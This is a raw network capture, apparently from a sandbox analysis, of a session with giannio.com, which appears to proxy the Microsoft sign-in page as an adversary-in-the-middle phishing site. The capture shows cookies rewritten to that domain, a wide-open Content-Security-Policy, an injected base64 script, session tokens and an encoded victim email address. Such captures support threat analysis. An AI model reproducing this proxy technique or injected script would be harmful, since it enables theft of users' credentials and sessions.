Set-Cookie: RoutingKeyCookie=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v1=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v1=; domain=giannio.com; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.id_token.v1=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.code.v1=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_nonce.v1=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_correlation_id=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.tokenPostPath=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.id_token.v1=; domain=giannio.com; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.code.v1=; domain=giannio.com; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_nonce.v1=; domain=giannio.com; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_correlation_id=; domain=giannio.com; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.tokenPostPath=; domain=giannio.com; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.nonce.v3.Wj9aGN8jRqQPBEpjiC9thrSpO5GWE7W0H04b1p4VQII=638724680625488508.fd0f915d-5cb0-4626-9263-f0a941dbb6e4; expires=Tue, 14-Jan-2025 17:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: HostSwitchPrg=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OptInPrg=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: SuiteServiceProxyKey=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: ClientId=6D041578E8394D49BCAE840660191B27; expires=Wed, 14-Jan-2026 16:14:22 GMT; path=/;SameSite=None; secure Set-Cookie: OIDC=1; expires=Mon, 14-Jul-2025 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: RoutingKeyCookie=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v1=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.token.v1=; domain=giannio.com; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.id_token.v1=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.code.v1=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_nonce.v1=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_correlation_id=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.tokenPostPath=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.id_token.v1=; domain=giannio.com; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.code.v1=; domain=giannio.com; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_nonce.v1=; domain=giannio.com; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.idp_correlation_id=; domain=giannio.com; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.tokenPostPath=; domain=giannio.com; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OpenIdConnect.nonce.v3.Wj9aGN8jRqQPBEpjiC9thrSpO5GWE7W0H04b1p4VQII=638724680625488508.fd0f915d-5cb0-4626-9263-f0a941dbb6e4; expires=Tue, 14-Jan-2025 17:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: HostSwitchPrg=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OptInPrg=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: SuiteServiceProxyKey=; expires=Sat, 14-Jan-1995 16:14:22 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: X-OWA-RedirectHistory=ArLym14BqGT3gbY03Qg; expires=Tue, 14-Jan-2025 22:16:22 GMT; path=/;SameSite=None; secure; HttpOnly X-CalculatedBETarget: VI1PR10MB3981.EURPRD10.PROD.OUTLOOK.COM X-RUM-Validated: 1 X-RUM-NotUpdateQueriedPath: 1 X-RUM-NotUpdateQueriedDbCopy: 1 X-BeSku: WCS6 X-OWA-DiagnosticsInfo: 6;0;0; X-BackEnd-Begin: 2025-01-14T16:14:22.548 X-BackEnd-End: 2025-01-14T16:14:22.564 X-DiagInfo: VI1PR10MB3981 X-BEServer: VI1PR10MB3981 X-UA-Compatible: IE=EmulateIE7 X-ResponseOrigin: OwaAppPool X-Proxy-RoutingCorrectness: 1 X-Proxy-BackendServerStatus: 302 X-FEProxyInfo: AM0PR10CA0034.EURPRD10.PROD.OUTLOOK.COM X-FEEFZInfo: AMS X-FEServer: VI1P189CA0033, AM0PR10CA0034 NEL: {"report_to":"NelOfficeUpload1","max_age":7200,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01} Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000 X-FirstHopCafeEFZ: AMS Date: Tue, 14 Jan 2025 16:14:22 GMT Connection: close Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2025-01-14 16:14:22 UTC	1355	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 5a 79 49 70 4b 58 74 6b 62 32 4e 31 62 57 56 75 64 43 35 6f 5a 57 46 6b 4c 6d 46 77 63 47 56 75 5a 45 4e 6f 61 57 78 6b 4b 45 39 69 61 6d 56 6a 64 43 35 68 63 33 4e 70 5a 32 34 6f 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 33 4a 6c 59 58 52 6c 52 57 78 6c 62 57 56 75 64 43 67 69 5a 47 6c 32 49 69 6b 73 65 Data Ascii: <html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:23 UTC	1938	OUT	GET /?phzt1wdp9=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmY2xpZW50LXJlcXVlc3QtaWQ9N2VhZGM3MTktYzRiYy1jN2MzLTYwMDMtODY5NzE1YWU0ZjU2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNDY4MDYyNTQ4ODUwOC5mZDBmOTE1ZC01Y2IwLTQ2MjYtOTI2My1mMGE5NDFkYmI2ZTQmc3RhdGU9RGN0QkRvTWdFRUJSYU1fUzd0QVJoM0ZZTkI3RkRFVUtpY1ZFVFhyOXNuaF85N1ZTNnQ3Y0dnMHRhcUtSSjR2RVFOWWhzd1B1VW9Ua0J4ZU5ld2N3U0phTXR6U2FCT0p4aUNIUWlycTl6MzdfU1Q5di02ZlVKWmQ2dlNRZVJlcFhqak1fRUdvLXU3cGVmdw== HTTP/1.1 Host: giannio.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://5eedab40.shaullerica.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=hFN11MKGCHZs; qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY; ClientId=6D041578E8394D49BCAE840660191B27; OIDC=1; OpenIdConnect.nonce.v3.Wj9aGN8jRqQPBEpjiC9thrSpO5GWE7W0H04b1p4VQII=638724680625488508.fd0f915d-5cb0-4626-9263-f0a941dbb6e4; X-OWA-RedirectHistory=ArLym14BqGT3gbY03Qg
2025-01-14 16:14:23 UTC	2930	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Strict-Transport-Security: max-age=31536000; includeSubDomains P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" x-ms-request-id: add632a0-44db-43c9-ad00-9269c17e9601 x-ms-ests-server: 2.1.19683.6 - SEC ProdSlices nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-srs: 1.P Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-HG_uN3KUsPih5uGwGJXFgw' 'unsafe-inline' 'unsafe-eval' https://.msauth.net https://.msftauth.net https://.msftauthimages.net https://.msauthimages.net https://.msidentity.com https://.microsoftonline-p.com https://.microsoftazuread-sso.com https://.azureedge.net https://.outlook.com https://.office.com https://.office365.com https://.microsoft.com https://.bing.com 'report-sample'; img-src 'self' data: https://.msauth.net https://.msftauth.net https://.msftauthimages.net https://.msauthimages.net https://.msidentity.com https://.microsoftonline-p.com https://.microsoftazuread-sso.com https://.azureedge.net https://.outlook.com https://.office.com https://.office365.com https://.microsoft.com https://.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-All Set-Cookie: esctx-EYYo7bTJmw=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeJpAwmJuhY6fIh76LMdEGkXD34bp6Rut4iwBF6BX79VVNGev-TmPmsvtxXfMlTgzS9yZ9N831OCl95SJF6pO_XGa0SwajFb8hPgCPLygrVgDgMIdNTFJqYNhKjRuQIeOx0FTXALYZ1eMOWYAS94P1-CAA; domain=giannio.com; path=/; secure; HttpOnly; SameSite=None Set-Cookie: fpc=Aigy6MsT76xAmzN3plwdK4c; expires=Thu, 13-Feb-2025 16:14:23 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFegi7USDB8ft-k1JNq7kl52zenHxg0Yjwe9nUft6bN9IpDtp32I-F-IxUHU4T8KfGzDaBetLD8jeYB7_HP5FJ_AU6VJe_ewS5WXr-jB7hryNeCRQ4uw3EF7CyZXDM9HuAv9maF_z_B28F18RwyS7iBub8wrdshjzDCuiae8sKOnosgAA; domain=giannio.com; path=/; secure; HttpOnly; SameSite=None Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly Set-Cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly Date: Tue, 14 Jan 2025 16:14:22 GMT Connection: close content-length: 21290 Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2025-01-14 16:14:23 UTC	13454	IN	Data Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 5a 79 49 70 4b 58 74 6b 62 32 Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2
2025-01-14 16:14:23 UTC	7836	IN	Data Raw: 6e 28 29 7b 0a 22 6c 6f 61 64 65 64 22 3d 3d 3d 73 2e 72 65 61 64 79 53 74 61 74 65 3f 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 68 28 65 2c 6f 2c 69 2c 73 29 7d 2c 35 30 30 29 3a 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 73 2e 72 65 61 64 79 53 74 61 74 65 26 26 68 28 65 2c 6f 2c 69 2c 73 29 7d 2c 74 28 73 29 2c 72 28 22 5b 24 4c 6f 61 64 65 72 5d 3a 20 4c 6f 61 64 69 6e 67 20 27 22 2b 28 61 2e 73 72 63 50 61 74 68 7c 7c 22 22 29 2b 22 27 2c 20 69 64 3a 22 2b 28 61 2e 69 64 7c 7c 22 22 29 29 7d 65 6c 73 65 7b 6f 26 26 6f 28 29 7d 7d 76 61 72 20 70 3d 65 28 29 2c 79 3d 70 2e 73 6c 4d 61 78 52 65 74 72 79 7c 7c 32 2c 6d 3d 70 2e 6c 6f 61 64 65 72 7c 7c 7b 7d 2c 62 3d 6d 2e 63 64 6e 52 6f 6f 74 73 7c 7c 5b 5d 2c 24 3d 6d 2e 74 65 6e 61 Data Ascii: n(){"loaded"===s.readyState?setTimeout(function(){h(e,o,i,s)},500):"complete"===s.readyState&&h(e,o,i,s)},t(s),r("[$Loader]: Loading '"+(a.srcPath\|\|"")+"', id:"+(a.id\|\|""))}else{o&&o()}}var p=e(),y=p.slMaxRetry\|\|2,m=p.loader\|\|{},b=m.cdnRoots\|\|[],$=m.tena

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:24 UTC	2319	OUT	GET /aadcdn.msauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1 Host: giannio.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://giannio.com/?phzt1wdp9=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1hZHJpYW5tYXJzaCU0MG5ocy5uZXQmY2xpZW50LXJlcXVlc3QtaWQ9N2VhZGM3MTktYzRiYy1jN2MzLTYwMDMtODY5NzE1YWU0ZjU2JnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODcyNDY4MDYyNTQ4ODUwOC5mZDBmOTE1ZC01Y2IwLTQ2MjYtOTI2My1mMGE5NDFkYmI2ZTQmc3RhdGU9RGN0QkRvTWdFRUJSYU1fUzd0QVJoM0ZZTkI3RkRFVUtpY1ZFVFhyOXNuaF85N1ZTNnQ3Y0dnMHRhcUtSSjR2RVFOWWhzd1B1VW9Ua0J4ZU5ld2N3U0phTXR6U2FCT0p4aUNIUWlycTl6MzdfU1Q5di02ZlVKWmQ2dlNRZVJlcFhqak1fRUdvLXU3cGVmdw== Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=hFN11MKGCHZs; qPdM.sig=kLeeELDLsoVcQ3j4mxqYtjIGLpY; ClientId=6D041578E8394D49BCAE840660191B27; OIDC=1; OpenIdConnect.nonce.v3.Wj9aGN8jRqQPBEpjiC9thrSpO5GWE7W0H04b1p4VQII=638724680625488508.fd0f915d-5cb0-4626-9263-f0a941dbb6e4; X-OWA-RedirectHistory=ArLym14BqGT3gbY03Qg; esctx-EYYo7bTJmw=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeJpAwmJuhY6fIh76LMdEGkXD34bp6Rut4iwBF6BX79VVNGev-TmPmsvtxXfMlTgzS9yZ9N831OCl95SJF6pO_XGa0SwajFb8hPgCPLygrVgDgMIdNTFJqYNhKjRuQIeOx0FTXALYZ1eMOWYAS94P1-CAA; fpc=Aigy6MsT76xAmzN3plwdK4c; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFegi7USDB8ft-k1JNq7kl52zenHxg0Yjwe9nUft6bN9IpDtp32I-F-IxUHU4T8KfGzDaBetLD8jeYB7_HP5FJ_AU6VJe_ewS5WXr-jB7hryNeCRQ4uw3EF7CyZXDM9HuAv9maF_z_B28F18RwyS7iBub8wrdshjzDCuiae8sKOnosgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
2025-01-14 16:14:24 UTC	1413	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:14:24 GMT Content-Type: application/x-javascript content-length: 142367 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 02 Oct 2024 20:05:23 GMT ETag: 0x8DCE31D8CF87EF9 x-ms-request-id: 126d4d1e-101e-004b-5b6d-6600a8000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20250114T161424Z-178d6947454qcts4hC1AMS1uns000000019000000000n44t x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2025-01-14 16:14:24 UTC	14971	IN	Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 6d 5b e3 38 d2 30 fa fd fe 15 c1 bb 0f 1d 4f 4c c8 0b d0 e0 b4 3b 77 1a d2 dd cc 00 61 08 cc cc 2e b0 5c 4e ac 80 bb 83 9d b5 1d 68 06 72 7e fb a9 17 c9 96 1d 87 ee d9 3d d7 f9 f2 cc 0b b1 a5 92 2c 95 aa 4a 55 a5 92 b4 f9 d3 da ff 54 7e aa 6c fc f8 3f 95 e1 79 ef ec bc 32 f8 58 39 ff 7c 78 76 50 39 85 b7 7f 54 4e 06 e7 87 fb fd 1f af 07 3f 8a ff 9f df f9 71 65 e2 4f 45 05 7e 47 6e 2c bc 4a 18 54 c2 a8 e2 07 e3 30 9a 85 91 9b 88 b8 72 0f 7f 23 df 9d 56 26 51 78 5f 49 ee 44 65 16 85 5f c4 38 89 2b 53 3f 4e a0 d0 48 4c c3 c7 4a 15 aa 8b bc ca a9 1b 25 4f 95 c3 53 b3 0e f5 0b a8 cd bf f5 03 28 3d 0e 67 4f f0 7c 97 54 82 30 f1 c7 a2 e2 06 1e d5 36 85 97 20 16 95 79 e0 89 a8 f2 78 e7 8f ef 2a c7 fe 38 0a e3 70 92 54 22 31 16 Data Ascii: m[80OL;wa.\Nhr~=,JUT~l?y2X9\|xvP9TN?qeOE~Gn,JT0r#V&Qx_IDe_8+S?NHLJ%OS(=gO\|T06 yx*8pT"1
2025-01-14 16:14:24 UTC	1413	IN	Data Raw: f4 6c 30 f8 e8 3c 53 4c ff 33 b9 ea 00 07 2a d6 0e 48 0e 5d 0b 6d a5 1f 11 15 0f 87 40 5c c3 5f 87 3d a0 22 7d 7c 69 c7 22 50 d2 07 3f 4a ee 3c 90 e6 7b 14 7a 96 9b 2d 99 8c 64 54 30 6d 63 68 ca c8 d7 73 8c 0c 4e 90 7e 96 0a fd d6 42 52 3a 7f 0c c1 7c 24 cb 01 49 89 5f b1 75 4d 26 66 94 c3 b8 85 47 a3 c5 42 f0 2a 06 d5 a2 b6 e1 06 1c 29 8b 71 b3 ca 81 48 4b 18 2d da 77 11 87 34 87 81 16 2d a6 02 6f db 7d c2 30 5a fe f0 46 9b 64 d6 3e 5f f5 c2 74 41 04 63 b8 99 6e bd f9 05 52 3a 15 3c fc 24 16 89 33 4f 26 1b bb bc 57 e6 22 9a f6 03 5c c5 f1 f2 05 be 6d 3c 3e 3e 6e 20 65 6c cc a3 a9 60 10 a2 11 dc cd a1 7c 39 ce 73 ca 8d 0d c5 b8 29 1b c2 48 b9 f7 f1 1c 77 35 64 1c b8 25 77 24 23 87 78 30 a8 c8 3d 72 eb 8f 14 34 69 35 69 d5 bc e9 3d 78 f0 61 54 90 f8 e9 fa Data Ascii: l0<SL3H]m@\_="}\|i"P?J<{z-dT0mchsN~BR:\|$I_uM&fGB)qHK-w4-o}0ZFd>_tAcnR:<$3O&W"\m<>>n el`\|9s)Hw5d%w$#x0=r4i5i=xaT
2025-01-14 16:14:24 UTC	7547	IN	Data Raw: 3f c0 1c 87 b2 6f 6a 43 93 b8 4e d5 95 64 21 fb 21 a7 0c bc 47 fe 43 f8 ed bf ed d5 5d 7a ba 94 ec 4a 96 e0 44 da d9 53 75 9c 12 b1 3b 28 d1 8f fc 7b 1f 74 20 56 ae 70 a3 3a 4e 6d bf df a9 e5 a7 78 98 84 33 63 15 da e5 ed 6b 9c 79 78 f8 9f f6 63 45 33 f1 4c ac 1f c2 53 ae 19 6a 2b f8 ff b7 6d c1 63 ba fe 72 5b 24 28 df a7 96 23 81 15 a2 fe 59 f1 89 d0 f9 23 28 a3 af ac a1 76 d2 5d 1a 5d 7b a9 f1 44 72 7c e9 1c 6a 5f 4b 02 51 35 0c 50 61 7c 1f cc b0 f2 92 38 54 92 38 bc 4c 94 24 0e 75 49 6c 5a 99 94 70 bc aa a1 9e 0d 99 c1 1b d4 40 0e b9 54 ab 0e 57 96 45 c5 48 4e 91 1d 27 bd 07 58 60 29 31 03 ed 07 ca fd 59 40 3f 9e 8d 6a 3e 4f bb d3 22 9c 96 6d 87 eb eb 61 95 46 96 4e 24 b8 15 bf 29 06 c7 cf 16 d3 54 bf d0 aa 87 f1 90 07 b8 c9 1e e5 13 15 28 1d 89 48 c6 Data Ascii: ?ojCNd!!GC]zJDSu;({t Vp:Nmx3ckyxcE3LSj+mcr[$(#Y#(v]]{Dr\|j_KQ5Pa\|8T8L$uIlZp@TWEHN'X`)1Y@?j>O"maFN$)T(H
2025-01-14 16:14:24 UTC	8837	IN	Data Raw: 9b 7b f7 fe b6 8d 24 6d f4 ff f3 29 28 ac 7f 36 10 42 b0 e4 24 33 09 68 84 3f 47 b6 27 ce c4 97 b5 e4 24 33 b2 46 0b 12 a0 04 8b 02 38 00 28 5b 23 f1 bb 9f 7a aa ba 1b 8d 0b 65 67 76 ce 79 df d9 8d 05 02 8d 46 5f ab eb fa 14 cb fa 54 d4 18 08 f8 bd 54 11 0f 51 f0 0b d1 21 72 26 04 42 13 0a 66 12 85 cc 80 77 f4 df d8 e1 27 36 24 08 48 d0 51 1c 68 e9 4b 4c cc 44 11 79 68 de 44 37 5d 9a 0e e0 ab 2d dc 0b 35 6e e3 7f 6a ad 46 3e 16 fa a2 8f 2a 4d b4 15 89 34 04 48 ee ee a2 b0 76 ff a1 9a db 47 39 13 f8 ad 14 f7 8d 1e 3c ee f4 51 84 89 0f 5e c6 ca 83 47 c1 76 38 93 37 c7 47 27 fc 8c 8a bf 8e 3a 14 c8 4d 87 04 6a 98 ad e9 2d 8f 03 09 23 54 20 57 34 17 f4 3d 3c 69 91 2a 05 8a 3c 52 a7 62 7d 1e d7 23 a0 76 57 a3 65 76 91 8e 60 65 30 8e 61 93 11 89 48 55 36 23 e2 Data 